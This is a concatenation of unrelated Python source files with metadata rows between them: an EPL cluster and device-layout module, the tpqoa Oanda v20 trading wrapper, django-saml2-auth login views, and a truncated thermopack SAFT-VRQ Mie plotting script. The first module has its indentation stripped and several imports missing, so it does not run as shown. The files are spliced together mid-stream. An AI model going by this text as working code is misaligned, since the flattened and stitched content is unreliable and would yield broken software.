from tensorflow.python.training import server_lib
from epl.env import Env
from epl.ir.graph import Graph
from epl.utils import common
from epl.utils import constant
from epl.utils import metric
class VirtualDevice(object):
"""Devices for one task graph"""
def __init__(self, index, slice_devices, worker_index, local_device_indices=None):
"""
Initialize a VirtualDevice object.
Args:
index: virtual device index.
slice_devices: a list of device tuple.
worker_index: current worker index.
local_device_indices: indices to get local indices.
"""
self._index = index
self._worker_index = worker_index
self._slice_devices = slice_devices
self._all_devices = tuple(np.reshape(slice_devices, [-1]))
if self._index == 0:
      # The first virtual device computes the local device indices; later ones reuse them.
self._local_device_indices = tuple(idx for idx, device in enumerate(self._all_devices) if self._device_in_local_worker(device))
else:
if local_device_indices is None:
raise RuntimeError("local_device_indices is required for non-constructors")
self._local_device_indices = local_device_indices
self._local_devices = tuple(self._all_devices[idx] for idx in self._local_device_indices)
@property
def local_devices(self):
return self._local_devices
@property
def local_device_indices(self):
return self._local_device_indices
@property
def all_devices(self):
return self._all_devices
def get_device(self, replica_idx, device_idx):
"""
Args:
replica_idx: replica index.
device_idx: device index for certain replica.
"""
return self._slice_devices[replica_idx][device_idx]
def _device_in_local_worker(self, device):
return common.get_task_index_from_device_str(device) == self._worker_index
@property
def num_replicas(self):
"""Global number of replicas."""
return len(self._all_devices) if self._all_devices else 1
def __str__(self):
return str(self._slice_devices)
def __repr__(self):
return self.__str__()
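# --- Editor's note (added; not in the original source): a VirtualDevice wraps
# one taskgraph's device matrix: slice_devices is indexed [replica][device],
# all_devices flattens it, and the local_* views restrict it to the devices
# hosted on this worker.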
class LayoutImpl(object):
@staticmethod
def slice(layout_info, clus):
raise NotImplementedError
class AllLayout(LayoutImpl):
"""Make all devices into one slice."""
@staticmethod
def slice(layout_info, clus):
slices = [[]]
for worker_index in range(clus.worker_num):
for gpu_index in range(clus.gpu_num_per_worker):
slices[0].append([
common.get_device_string(task=worker_index, device_index=gpu_index)
])
return slices
def get_device_list(worker_num, gpu_num_per_worker, prefer_row=True):
"""Get a list of devices from each worker."""
if prefer_row:
for worker_index in range(worker_num):
for gpu_index in range(gpu_num_per_worker):
yield common.get_device_string(task=worker_index, device_index=gpu_index)
else:
for gpu_index in range(gpu_num_per_worker):
for worker_index in range(worker_num):
yield common.get_device_string(task=worker_index, device_index=gpu_index)
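# --- Editor's worked example (added; not in the original source): for 2
# workers with 2 GPUs each, prefer_row=True yields
#   task:0/GPU:0, task:0/GPU:1, task:1/GPU:0, task:1/GPU:1
# while prefer_row=False interleaves workers first:
#   task:0/GPU:0, task:1/GPU:0, task:0/GPU:1, task:1/GPU:1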
def generate_device_slices(cluster, device_per_replicas, num_replica):
"""Generate device slices."""
num_taskgraph = len(device_per_replicas)
slices = [[[] for _ in range(num_replica)] for _ in range(num_taskgraph)]
prefer_row = Env.get().config.cluster.device_place_prefer_intra_node
all_devices = get_device_list(cluster.worker_num, cluster.gpu_num_per_worker, prefer_row)
for replica_id in range(num_replica):
for ti in range(num_taskgraph):
for _ in range(device_per_replicas[ti]):
slices[ti][replica_id].append(next(all_devices))
return slices
class AutoLayout(LayoutImpl):
"""Group devices into slices automatically based on taskgraphs."""
@staticmethod
def slice(layout_info, clus):
# TODO(sayang): Support fuse/cross nodes.
taskgraphs = Graph.get().taskgraphs
total_device_num = clus.worker_num * clus.gpu_num_per_worker
num_device_per_replica = sum(tg.num_device_per_replica for tg in taskgraphs)
if total_device_num % num_device_per_replica != 0:
raise RuntimeError("Total devices {} is not divisible by num_device_per_replica {}".format(total_device_num, num_device_per_replica))
num_replica = total_device_num // num_device_per_replica
device_per_replicas = [tg.num_device_per_replica for tg in taskgraphs]
return generate_device_slices(clus, device_per_replicas, num_replica)
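# --- Editor's worked example (added; not in the original source): with 8 GPUs
# in total and two taskgraphs needing 2 + 2 devices per replica,
# num_device_per_replica == 4, so AutoLayout builds num_replica == 8 // 4 == 2
# replicas of the two-stage pipeline.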
class SpecificLayout(LayoutImpl):
"""Use slices specified by users."""
@staticmethod
def slice(layout_info, clus):
return layout_info
class AwareRowLayout(LayoutImpl):
"""Slice cluster in row way with aware net topology."""
@staticmethod
def slice(layout_info, clus):
gpu_num_per_slice = int(layout_info)
total_worker_num = len(clus.hosts.split(","))
slice_num = int(total_worker_num / gpu_num_per_slice)
if clus.gpu_num_per_worker != 1 or slice_num == 0 \
or total_worker_num % slice_num != 0:
raise RuntimeError(
"GPU per-worker is not 1, or total GPU number "
"is not divisible by stage number. Total machine"
": %s, GPU per-worker: %s, stage: %s." %
(total_worker_num, clus.gpu_num_per_worker, slice_num))
slices = [[] for unused_x in range(slice_num)]
gpu_index = 0
for worker_index in range(total_worker_num):
slice_index = worker_index / gpu_num_per_slice
slices[int(slice_index)].append(
[common.get_device_string(task=worker_index, device_index=gpu_index)])
return slices
@staticmethod
def reorder_hosts(clus):
""" Reorder hosts and reset worker_index."""
# Group workers by machine
hosts = clus.hosts.split(",")
workers_group_by_machine = {}
for idx_worker, host in enumerate(hosts):
host_name = host.split(":")[0]
if host_name not in workers_group_by_machine:
workers_group_by_machine[host_name] = []
workers_group_by_machine[host_name].append(idx_worker)
# Check number of workers for each machine
worker_num_per_machine = 0
for key in workers_group_by_machine:
if worker_num_per_machine == 0:
worker_num_per_machine = len(workers_group_by_machine[key])
elif worker_num_per_machine != len(workers_group_by_machine[key]):
raise RuntimeError("Number of workers must be " \
"the same for each machine.")
clus.worker_num_per_machine = worker_num_per_machine
# Reorder hosts
new_hosts = ""
for key in workers_group_by_machine:
host_temp = ""
for worker in workers_group_by_machine[key]:
if not host_temp:
host_temp = hosts[worker]
else:
host_temp = host_temp + "," + hosts[worker]
# Rank 0 must be the same after reordering
if not new_hosts:
new_hosts = host_temp
elif workers_group_by_machine[key][0] == 0:
new_hosts = host_temp + "," + new_hosts
else:
new_hosts = new_hosts + "," + host_temp
tf_logging.info("Reorder hosts by AwareRowLayout,"
" origin hosts: {}, new hosts: {}" \
.format(clus.hosts, new_hosts))
clus.hosts = new_hosts
# Reset worker_index
new_hosts_list = new_hosts.split(",")
for idx_worker, host in enumerate(new_hosts_list):
if hosts[clus.worker_index] == host:
clus.worker_index = idx_worker
break
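# --- Editor's worked example (added; not in the original source): with 4
# single-GPU workers and layout_info == "2", AwareRowLayout.slice builds
# slice_num == 2 groups: [[worker0], [worker1]] and [[worker2], [worker3]].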
class Layout(object):
"""Layout of slicing cluster to slices."""
def __init__(self, layout):
self._data = {}
if isinstance(layout, str):
self._data[layout] = "none"
else:
self._data = dict(layout)
def __getattr__(self, name):
if name in self._data:
return self._data[name]
return None
def __str__(self):
return str(self._data)
def __repr__(self):
return self.__str__()
def slice(self, clus):
"""Slice cluster to slices."""
    total_state = \
        int(bool(self.specific)) + \
        int(bool(self.all)) + \
        int(bool(self.aware_row)) + \
        int(bool(self.auto))
if total_state > 1:
raise ValueError("Can't set multiple layout to slice cluster. Layout: %s" % self)
if self.all:
return AllLayout.slice(self.all, clus)
if self.specific:
return SpecificLayout.slice(self.specific, clus)
if self.aware_row:
return AwareRowLayout.slice(self.aware_row, clus)
if self.auto:
return AutoLayout.slice(self.auto, clus)
raise RuntimeError("Layout is not supported. Layout: %s ." % self)
def reorder_hosts(self, clus):
"""Reorder hosts and reset worker_index for cluster."""
if self.aware_row:
AwareRowLayout.reorder_hosts(clus)
class Cluster(object): # pylint: disable=invalid-name
"""epl cluster."""
def __init__(self,
worker_hosts=None,
ps_hosts=None,
job_name=constant.DEFAULT_TASK_NAME,
worker_index=0,
layout="all"):
# Try to get hosts information from TF_CONFIG if worker hosts is None.
if not worker_hosts:
tf_config = os.environ.get(constant.ENV_TF_CONFIG)
if not tf_config:
# Construct TF_CONFIG to schedule a server even for one worker.
tf_logging.info("Training as a single worker for no TF_CONFIG found.")
# Specifying port 0 means that the OS will choose a free port for the
# server.
tf_config = '{"cluster":{"worker":["127.0.0.1:0"]},"task":' \
'{"type":"worker","index":0}}'
tf_config_json = json.loads(tf_config)
tf_config_worker_hosts = tf_config_json.get("cluster", {}).get("worker")
tf_config_ps_hosts = tf_config_json.get("cluster", {}).get("ps")
tf_config_chief_hosts = tf_config_json.get("cluster", {}).get("chief")
tf_config_job_name = tf_config_json.get("task", {}).get("type")
tf_config_task_index = tf_config_json.get("task", {}).get("index")
if tf_config_chief_hosts:
if not tf_config_worker_hosts:
tf_config_worker_hosts = tf_config_chief_hosts
else:
# Put chief host before worker hosts to treat chief as worker 0.
tf_config_worker_hosts = \
tf_config_chief_hosts + tf_config_worker_hosts
if tf_config_job_name == constant.DEFAULT_TASK_NAME:
tf_config_task_index += 1
if tf_config_job_name == constant.CHIEF_WORKER_NAME:
tf_config_job_name = constant.DEFAULT_TASK_NAME
if tf_config_worker_hosts is None or tf_config_job_name is None \
or tf_config_task_index is None:
raise ValueError("Get hosts information failed for incomplete "
"TF_CONFIG: %s." % tf_config)
worker_hosts = ",".join(tf_config_worker_hosts)
if tf_config_ps_hosts:
ps_hosts = ",".join(tf_config_ps_hosts)
job_name = tf_config_job_name
worker_index = tf_config_task_index
if not ps_hosts:
hosts = worker_hosts
self._worker_index = worker_index
else: # support ps_hosts and process as worker_hosts
hosts = worker_hosts + "," + ps_hosts
worker_list = worker_hosts.split(",")
worker_num = len(worker_list)
if job_name == constant.DEFAULT_TASK_NAME:
self._worker_index = worker_index
else:
self._worker_index = worker_index + worker_num
self._hosts = hosts
self._worker_num = len(hosts.split(","))
self._worker_num_per_machine = 1
self._cluster_spec = \
server_lib.ClusterSpec({
constant.DEFAULT_TASK_NAME: self._hosts.split(",")})
self._available_devices = self.available_gpus()
self.set_default_device()
self._layout = None
self._layout_type = layout
self._virtual_devices = []
if layout:
self.generate_virtual_devices()
tf_logging.info(self)
# add metric
if self._worker_index == 0:
metric.add_metric(constant.DISTRIBUTED_FRAMEWORK,
constant.DISTRIBUTED_FRAMEWORK_NAME)
def generate_virtual_devices(self, layout=None):
"""Generate virtual devices"""
if self._virtual_devices:
tf_logging.warn("Virtual devices are not empty, return existing ones.")
return self._virtual_devices
layout_type = layout if layout else self._layout_type
self._layout = Layout(layout_type)
self._layout.reorder_hosts(self)
self._slices = self._layout.slice(self)
local_device_indices = None
for index, devices in enumerate(self._slices):
vd = VirtualDevice(index, devices, self._worker_index, local_device_indices)
self._virtual_devices.append(vd)
if index == 0:
local_device_indices = vd.local_device_indices
return self._virtual_devices
@property
def virtual_devices(self):
return self._virtual_devices
def available_gpus(self):
"""Get available gpu list."""
config = Env.get().get_config_proto()
local_device_protos = device_lib.list_local_devices(config)
count = len(
[x.name for x in local_device_protos if x.device_type == "GPU"])
devices = []
for gpu_idx in range(count):
devices.append(
common.get_device_string(task=self._worker_index, device_index=gpu_idx))
return devices
def current_worker_chief_gpu(self):
return common.get_device_string(task=self._worker_index)
def current_worker_cpu(self):
return common.get_device_string(task=self._worker_index, device_type="CPU")
def set_default_device(self, tf_graph=None):
"""Set default device as GPU for tf graph."""
if tf_graph is None:
tf_graph = common.get_default_tf_graph()
if not tf_graph._graph_device_function_stack._stack: # pylint: disable=protected-access
tf_graph._add_device_to_stack(self.current_worker_chief_gpu()) # pylint: disable=protected-access
def get_local_rank(self, global_rank):
return global_rank % self.gpu_num_per_worker
@property
def worker_index(self):
return self._worker_index
@worker_index.setter
def worker_index(self, worker_index):
self._worker_index = worker_index
@property
def worker_num(self):
return self._worker_num
@property
def gpu_num_per_worker(self):
return len(self._available_devices)
@property
def available_devices(self):
return self._available_devices
@property
def cluster_spec(self):
return self._cluster_spec
@property
def total_gpu_num(self):
return self.gpu_num_per_worker * self.worker_num
@property
def hosts(self):
return self._hosts
@hosts.setter
def hosts(self, hosts):
self._hosts = hosts
@property
def worker_num_per_machine(self):
return self._worker_num_per_machine
@worker_num_per_machine.setter
def worker_num_per_machine(self, worker_num_per_machine):
self._worker_num_per_machine = worker_num_per_machine
def __str__(self):
return "ClusterSpec: %s, WorkerNumber:%s, TaskIndex: %s, " \
"AvailableDevices: %s, Layout:%s, VirtualDevices: %s" % (
self._cluster_spec,
self.worker_num,
self._worker_index,
self._available_devices,
self._layout,
self._virtual_devices)
def __repr__(self):
return self.__str__()
def __enter__(self):
Env.get().cluster = self
def __exit__(self, unused_exception_type, unused_exception_value,
unused_traceback):
# Keep cluster information in Env.
pass
| 34.029167 | 139 | 0.695727 |
2e9424bc78e6dadd64461e50fe7a8784abd594ac | 11,001 | py | Python | tpqoa/tpqoa.py | cecabrera/tpqoa | b86b89acc3e34f74dc6f7e82d265d909749c6f03 | [
"MIT"
] | null | null | null | tpqoa/tpqoa.py | cecabrera/tpqoa | b86b89acc3e34f74dc6f7e82d265d909749c6f03 | [
"MIT"
] | null | null | null | tpqoa/tpqoa.py | cecabrera/tpqoa | b86b89acc3e34f74dc6f7e82d265d909749c6f03 | [
"MIT"
] | null | null | null | #
# tpqoa is a wrapper class for the
# Oanda v20 API (RESTful & streaming)
# making use of the v20 Python package
#
# (c) Dr. Yves J. Hilpisch
# The Python Quants GmbH
#
#
# Trading forex/CFDs on margin carries a high level of risk and may
# not be suitable for all investors as you could sustain losses
# in excess of deposits. Leverage can work against you. Due to the certain
# restrictions imposed by the local law and regulation, German resident
# retail client(s) could sustain a total loss of deposited funds but are
# not subject to subsequent payment obligations beyond the deposited funds.
# Be aware and fully understand all risks associated with
# the market and trading. Prior to trading any products,
# carefully consider your financial situation and
# experience level. Any opinions, news, research, analyses, prices,
# or other information is provided as general market commentary, and does not
# constitute investment advice. The Python Quants GmbH will not accept
# liability for any loss or damage, including without limitation to,
# any loss of profit, which may arise directly or indirectly from use
# of or reliance on such information.
#
# The tpqoa package is intended as a technological illustration only.
# It comes with no warranties or representations,
# to the extent permitted by applicable law.
#
import v20
import configparser
import pandas as pd
from v20.transaction import StopLossDetails, ClientExtensions
from v20.transaction import TrailingStopLossDetails, TakeProfitDetails
class tpqoa(object):
''' tpqoa is a Python wrapper class for the Oanda v20 API. '''
def __init__(self, conf_file):
''' Init function is expecting a configuration file with
the following content:
[oanda]
account_id = XYZ-ABC-...
access_token = ZYXCAB...
account_type = practice (default) or live
Parameters
==========
conf_file: string
path to and filename of the configuration file,
e.g. '/home/me/oanda.cfg'
'''
self.config = configparser.ConfigParser()
self.config.read(conf_file)
self.access_token = self.config['oanda']['access_token']
self.account_id = self.config['oanda']['account_id']
self.account_type = self.config['oanda']['account_type']
if self.account_type == 'live':
self.hostname = 'api-fxtrade.oanda.com'
self.stream_hostname = 'stream-fxtrade.oanda.com'
else:
self.hostname = 'api-fxpractice.oanda.com'
self.stream_hostname = 'stream-fxpractice.oanda.com'
self.ctx = v20.Context(
hostname=self.hostname,
port=443,
# ssl=True,
# application='sample_code',
token=self.access_token,
# datetime_format='RFC3339'
)
self.ctx_stream = v20.Context(
hostname=self.stream_hostname,
port=443,
# ssl=True,
# application='sample_code',
token=self.access_token,
# datetime_format='RFC3339'
)
self.suffix = '.000000000Z'
self.stop_stream = False
def get_instruments(self):
''' Retrieves and returns all instruments for the given account. '''
resp = self.ctx.account.instruments(self.account_id)
instruments = resp.get('instruments')
instruments = [ins.dict() for ins in instruments]
instruments = [(ins['displayName'], ins['name'])
for ins in instruments]
return instruments
def transform_datetime(self, dati):
''' Transforms Python datetime object to string. '''
if isinstance(dati, str):
dati = pd.Timestamp(dati).to_pydatetime()
return dati.isoformat('T') + self.suffix
def retrieve_data(self, instrument, start, end, granularity, price, smooth = False, dailyAlignment = 17, alignmentTimezone = "America/New_York"):
raw = self.ctx.instrument.candles(
instrument=instrument,
fromTime=start, toTime=end,
granularity=granularity, price=price, smooth=smooth, dailyAlignment=dailyAlignment, alignmentTimezone=alignmentTimezone)
raw = raw.get('candles')
raw = [cs.dict() for cs in raw]
if price == 'A':
for cs in raw:
cs.update(cs['ask'])
del cs['ask']
elif price == 'B':
for cs in raw:
cs.update(cs['bid'])
del cs['bid']
elif price == 'M':
for cs in raw:
cs.update(cs['mid'])
del cs['mid']
else:
raise ValueError("price must be either 'B', 'A' or 'M'.")
if len(raw) == 0:
return pd.DataFrame() # return empty DataFrame if no data
data = pd.DataFrame(raw)
data['time'] = pd.to_datetime(data['time'])
data = data.set_index('time')
data.index = pd.DatetimeIndex(data.index)
for col in list('ohlc'):
data[col] = data[col].astype(float)
return data
def get_history(self, instrument, start, end,
granularity, price, smooth = False, dailyAlignment = 17, alignmentTimezone = "America/New_York"):
''' Retrieves historical data for instrument.
Source: https://developer.oanda.com/rest-live/rates/#retrieve-instrument-history
Parameters
==========
instrument: string
valid instrument name
start, end: datetime, str
Python datetime or string objects for start and end
granularity: string
a string like 'S5', 'M1' or 'D'
price: string
one of 'A' (ask), 'B' (bid) or 'M' (middle)
Returns
=======
data: pd.DataFrame
pandas DataFrame object with data
'''
if granularity.startswith('S') or granularity.startswith('M'):
if granularity.startswith('S'):
freq = '4h'
else:
freq = 'D'
data = pd.DataFrame()
dr = pd.date_range(start, end, freq=freq)
for t in range(len(dr) - 1):
start = self.transform_datetime(dr[t])
end = self.transform_datetime(dr[t + 1])
                batch = self.retrieve_data(instrument, start, end,
                                           granularity, price, smooth,
                                           dailyAlignment, alignmentTimezone)
data = data.append(batch)
else:
start = self.transform_datetime(start)
end = self.transform_datetime(end)
data = self.retrieve_data(instrument, start, end,
granularity, price, smooth, dailyAlignment, alignmentTimezone)
return data
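    # --- Editor's usage sketch (added; illustrative values, not from the
    # original source) ---
    # api = tpqoa('/home/me/oanda.cfg')
    # df = api.get_history('EUR_USD', '2020-01-01', '2020-02-01',
    #                      granularity='D', price='M')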
def create_order(self, instrument, units, sl_distance=None,
tsl_distance=None, tp_price=None, comment=None,
ret=False):
''' Places order with Oanda.
Parameters
==========
instrument: string
valid instrument name
units: int
number of units of instrument to be bought
(positive int, eg 'units=50')
or to be sold (negative int, eg 'units=-100')
sl_distance: float
stop loss distance price, mandatory eg in Germany
tsl_distance: float
trailing stop loss distance
tp_price: float
take profit price to be used for the trade
        comment: str
            optional client comment to attach to the order
'''
client_ext = ClientExtensions(
comment=comment) if comment is not None else None
sl_details = (StopLossDetails(distance=sl_distance,
clientExtensions=client_ext)
if sl_distance is not None else None)
tsl_details = (TrailingStopLossDetails(distance=tsl_distance,
clientExtensions=client_ext)
if tsl_distance is not None else None)
tp_details = (TakeProfitDetails(
price=tp_price, clientExtensions=client_ext)
if tp_price is not None else None)
request = self.ctx.order.market(
self.account_id,
instrument=instrument,
units=units,
stopLossOnFill=sl_details,
trailingStopLossOnFill=tsl_details,
takeProfitOnFill=tp_details,
)
order = request.get('orderFillTransaction')
print('\n\n', order.dict(), '\n')
        if ret:
return request
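    # --- Editor's usage sketch (added; illustrative, not from the original
    # source) ---
    # api.create_order('EUR_USD', units=100, sl_distance=0.01)   # market buy
    # api.create_order('EUR_USD', units=-100)                    # market sell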
def stream_data(self, instrument, stop=None, ret=False):
''' Starts a real-time data stream.
Parameters
==========
instrument: string
valid instrument name
'''
self.stream_instrument = instrument
self.ticks = 0
response = self.ctx_stream.pricing.stream(
self.account_id, snapshot=True,
instruments=instrument)
msgs = []
for msg_type, msg in response.parts():
msgs.append(msg)
# print(msg_type, msg)
if msg_type == 'pricing.ClientPrice':
self.ticks += 1
self.on_success(msg.time,
float(msg.bids[0].dict()['price']),
float(msg.asks[0].dict()['price']))
if stop is not None:
if self.ticks >= stop:
if ret:
return msgs
break
if self.stop_stream:
if ret:
return msgs
break
def on_success(self, time, bid, ask):
''' Method called when new data is retrieved. '''
print(time, bid, ask)
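    # --- Editor's sketch (added; not in the original source): subclass and
    # override on_success to consume ticks ---
    # class MidPrinter(tpqoa):
    #     def on_success(self, time, bid, ask):
    #         print(time, (bid + ask) / 2)
    # MidPrinter('/home/me/oanda.cfg').stream_data('EUR_USD', stop=10)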
def get_account_summary(self, detailed=False):
''' Returns summary data for Oanda account.'''
if detailed is True:
response = self.ctx.account.get(self.account_id)
else:
response = self.ctx.account.summary(self.account_id)
raw = response.get('account')
return raw.dict()
def get_transactions(self, tid=0):
''' Retrieves and returns transactions data. '''
response = self.ctx.transaction.since(self.account_id, id=tid)
transactions = response.get('transactions')
transactions = [t.dict() for t in transactions]
return transactions
def print_transactions(self, tid=0):
''' Prints basic transactions data. '''
transactions = self.get_transactions(tid)
for trans in transactions:
try:
templ = '%5s | %s | %9s | %12s | %8s'
print(templ % (trans['id'],
trans['time'],
trans['instrument'],
trans['units'],
trans['pl']))
            except KeyError:
                # not every transaction type carries these fields
                pass
| 38.33101 | 149 | 0.572493 |
59a3a8ca569c4237a5c745f666c29273c48e3bd9 | 9,030 | py | Python | django_saml2_auth/views.py | steverecio/django-saml2-auth | de424f0f5724ad31892ffefb54734f87840e147d | [
"Apache-2.0"
] | null | null | null | django_saml2_auth/views.py | steverecio/django-saml2-auth | de424f0f5724ad31892ffefb54734f87840e147d | [
"Apache-2.0"
] | null | null | null | django_saml2_auth/views.py | steverecio/django-saml2-auth | de424f0f5724ad31892ffefb54734f87840e147d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from saml2 import (
BINDING_HTTP_POST,
BINDING_HTTP_REDIRECT,
entity,
)
from saml2.client import Saml2Client
from saml2.config import Config as Saml2Config
from django import get_version
from pkg_resources import parse_version
from django.conf import settings
from django.contrib.auth.models import Group
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout, get_user_model
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from django.template import TemplateDoesNotExist
from django.http import HttpResponseRedirect
from django.utils.http import is_safe_url
from dj_rest_auth.utils import jwt_encode
from allauth.account.adapter import get_adapter
# default User or custom User. Now both will work.
User = get_user_model()
try:
import urllib2 as _urllib
except:
import urllib.request as _urllib
import urllib.error
import urllib.parse
if parse_version(get_version()) >= parse_version('1.7'):
from django.utils.module_loading import import_string
else:
from django.utils.module_loading import import_by_path as import_string
def _default_next_url():
if 'DEFAULT_NEXT_URL' in settings.SAML2_AUTH:
return settings.SAML2_AUTH['DEFAULT_NEXT_URL']
# Lazily evaluate this in case we don't have admin loaded.
return get_reverse('admin:index')
def get_current_domain(r):
if 'ASSERTION_URL' in settings.SAML2_AUTH:
return settings.SAML2_AUTH['ASSERTION_URL']
return '{scheme}://{host}'.format(
scheme='https' if r.is_secure() else 'http',
host=r.get_host(),
)
def get_reverse(objs):
'''In order to support different django version, I have to do this '''
if parse_version(get_version()) >= parse_version('2.0'):
from django.urls import reverse
else:
from django.core.urlresolvers import reverse
if objs.__class__.__name__ not in ['list', 'tuple']:
objs = [objs]
for obj in objs:
try:
return reverse(obj)
except:
pass
raise Exception('We got a URL reverse issue: %s. This is a known issue but please still submit a ticket at https://github.com/fangli/django-saml2-auth/issues/new' % str(objs))
def _get_metadata():
if 'METADATA_LOCAL_FILE_PATH' in settings.SAML2_AUTH:
return {
'local': [settings.SAML2_AUTH['METADATA_LOCAL_FILE_PATH']]
}
else:
return {
'remote': [
{
"url": settings.SAML2_AUTH['METADATA_AUTO_CONF_URL'],
},
]
}
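# --- Editor's illustrative settings sketch (added; placeholder values, not
# from the original source) ---
# SAML2_AUTH = {
#     'METADATA_AUTO_CONF_URL': 'https://idp.example.com/app/metadata',
#     'DEFAULT_NEXT_URL': '/admin',
#     'CREATE_USER': True,
# }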
def _get_saml_client(domain):
acs_url = domain + get_reverse([acs, 'acs', 'django_saml2_auth:acs'])
metadata = _get_metadata()
saml_settings = {
'metadata': metadata,
'service': {
'sp': {
'endpoints': {
'assertion_consumer_service': [
(acs_url, BINDING_HTTP_REDIRECT),
(acs_url, BINDING_HTTP_POST)
],
},
'allow_unsolicited': True,
'authn_requests_signed': False,
'logout_requests_signed': True,
'want_assertions_signed': True,
'want_response_signed': False,
},
},
}
if 'ENTITY_ID' in settings.SAML2_AUTH:
saml_settings['entityid'] = settings.SAML2_AUTH['ENTITY_ID']
if 'NAME_ID_FORMAT' in settings.SAML2_AUTH:
saml_settings['service']['sp']['name_id_format'] = settings.SAML2_AUTH['NAME_ID_FORMAT']
spConfig = Saml2Config()
spConfig.load(saml_settings)
spConfig.allow_unknown_attributes = True
saml_client = Saml2Client(config=spConfig)
return saml_client
@login_required
def welcome(r):
try:
return render(r, 'django_saml2_auth/welcome.html', {'user': r.user})
except TemplateDoesNotExist:
return HttpResponseRedirect(_default_next_url())
def denied(r):
return render(r, 'django_saml2_auth/denied.html')
def _create_new_user(username, email, firstname, lastname):
user = User.objects.create_user(username, email)
user.first_name = firstname
user.last_name = lastname
groups = [Group.objects.get(name=x) for x in settings.SAML2_AUTH.get('NEW_USER_PROFILE', {}).get('USER_GROUPS', [])]
if parse_version(get_version()) >= parse_version('2.0'):
user.groups.set(groups)
else:
user.groups = groups
user.is_active = settings.SAML2_AUTH.get('NEW_USER_PROFILE', {}).get('ACTIVE_STATUS', True)
user.is_staff = settings.SAML2_AUTH.get('NEW_USER_PROFILE', {}).get('STAFF_STATUS', True)
user.is_superuser = settings.SAML2_AUTH.get('NEW_USER_PROFILE', {}).get('SUPERUSER_STATUS', False)
user.save()
return user
@csrf_exempt
def acs(r):
saml_client = _get_saml_client(get_current_domain(r))
resp = r.POST.get('SAMLResponse', None)
next_url = r.session.get('login_next_url', _default_next_url())
if not resp:
return HttpResponseRedirect(get_reverse([denied, 'denied', 'django_saml2_auth:denied']))
authn_response = saml_client.parse_authn_request_response(
resp, entity.BINDING_HTTP_POST)
if authn_response is None:
return HttpResponseRedirect(get_reverse([denied, 'denied', 'django_saml2_auth:denied']))
user_identity = authn_response.get_identity()
if user_identity is None:
return HttpResponseRedirect(get_reverse([denied, 'denied', 'django_saml2_auth:denied']))
user_email = user_identity[settings.SAML2_AUTH.get('ATTRIBUTES_MAP', {}).get('email', 'Email')][0]
user_name = user_identity[settings.SAML2_AUTH.get('ATTRIBUTES_MAP', {}).get('username', 'UserName')][0]
user_first_name = user_identity[settings.SAML2_AUTH.get('ATTRIBUTES_MAP', {}).get('first_name', 'FirstName')][0]
user_last_name = user_identity[settings.SAML2_AUTH.get('ATTRIBUTES_MAP', {}).get('last_name', 'LastName')][0]
target_user = None
is_new_user = False
try:
target_user = User.objects.get(email=user_email)
if settings.SAML2_AUTH.get('TRIGGER', {}).get('BEFORE_LOGIN', None):
import_string(settings.SAML2_AUTH['TRIGGER']['BEFORE_LOGIN'])(user_identity)
except User.DoesNotExist:
new_user_should_be_created = settings.SAML2_AUTH.get('CREATE_USER', True)
if new_user_should_be_created:
target_user = _create_new_user(user_name, user_email, user_first_name, user_last_name)
if settings.SAML2_AUTH.get('TRIGGER', {}).get('CREATE_USER', None):
import_string(settings.SAML2_AUTH['TRIGGER']['CREATE_USER'])(user_identity)
is_new_user = True
else:
return HttpResponseRedirect(get_reverse([denied, 'denied', 'django_saml2_auth:denied']))
r.session.flush()
if target_user.is_active:
target_user.backend = 'django.contrib.auth.backends.ModelBackend'
get_adapter(r).login(r, target_user)
else:
return HttpResponseRedirect(get_reverse([denied, 'denied', 'django_saml2_auth:denied']))
if settings.SAML2_AUTH.get('USE_JWT') is True:
        # We use JWT auth: send the token to the frontend
jwt_token = jwt_encode(target_user)
query = '?uid={}&token={}'.format(target_user.id, jwt_token)
frontend_url = settings.SAML2_AUTH.get(
'FRONTEND_URL', next_url)
return HttpResponseRedirect(frontend_url+query)
if is_new_user:
try:
return render(r, 'django_saml2_auth/welcome.html', {'user': r.user})
except TemplateDoesNotExist:
return HttpResponseRedirect(next_url)
else:
return HttpResponseRedirect(next_url)
def signin(r):
try:
import urlparse as _urlparse
from urllib import unquote
except:
import urllib.parse as _urlparse
from urllib.parse import unquote
next_url = r.GET.get('next', _default_next_url())
try:
if 'next=' in unquote(next_url):
next_url = _urlparse.parse_qs(_urlparse.urlparse(unquote(next_url)).query)['next'][0]
except:
next_url = r.GET.get('next', _default_next_url())
# Only permit signin requests where the next_url is a safe URL
if parse_version(get_version()) >= parse_version('2.0'):
url_ok = is_safe_url(next_url, None)
else:
url_ok = is_safe_url(next_url)
if not url_ok:
return HttpResponseRedirect(get_reverse([denied, 'denied', 'django_saml2_auth:denied']))
r.session['login_next_url'] = next_url
saml_client = _get_saml_client(get_current_domain(r))
_, info = saml_client.prepare_for_authenticate()
redirect_url = None
for key, value in info['headers']:
if key == 'Location':
redirect_url = value
break
return HttpResponseRedirect(redirect_url)
def signout(r):
logout(r)
return render(r, 'django_saml2_auth/signout.html')
| 33.947368 | 179 | 0.673533 |
6b48de40691e37ffc5019d51b1512c68973f2900 | 786 | py | Python | addon/pyExamples/saft_vrq_mie.py | jabirali/thermopack | edad37dacaae5a820faa41593267ce6d891a4e52 | [
"MIT"
] | 28 | 2020-10-14T07:51:21.000Z | 2022-03-21T04:59:23.000Z | addon/pyExamples/saft_vrq_mie.py | jabirali/thermopack | edad37dacaae5a820faa41593267ce6d891a4e52 | [
"MIT"
] | 20 | 2020-10-26T11:43:43.000Z | 2022-03-30T22:06:30.000Z | addon/pyExamples/saft_vrq_mie.py | jabirali/thermopack | edad37dacaae5a820faa41593267ce6d891a4e52 | [
"MIT"
] | 13 | 2020-10-27T13:04:19.000Z | 2022-03-21T04:59:24.000Z | #!/usr/bin/python
# Support for python2
from __future__ import print_function
# Modify system path
import sys
sys.path.append('../pycThermopack/')
# Importing pyThermopack
from pyctp import saftvrqmie
# Importing Numpy (math, arrays, etc...)
import numpy as np
# Importing Matplotlib (plotting)
import matplotlib.pyplot as plt
# Instantiate and init SAFT-VRQ Mie object
qSAFT = saftvrqmie.saftvrqmie()
qSAFT.init("He,H2,Ne")
qSAFT.set_tmin(temp=2.0)
# Plot phase envelope
z = np.array([0.01, 0.89, 0.1])
T, P, v = qSAFT.get_envelope_twophase(1.0e4, z, maximum_pressure=1.5e7, calc_v=True)
Tc, vc, Pc = qSAFT.critical(z)
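# Editor's note (added; not in the original script): get_envelope_twophase
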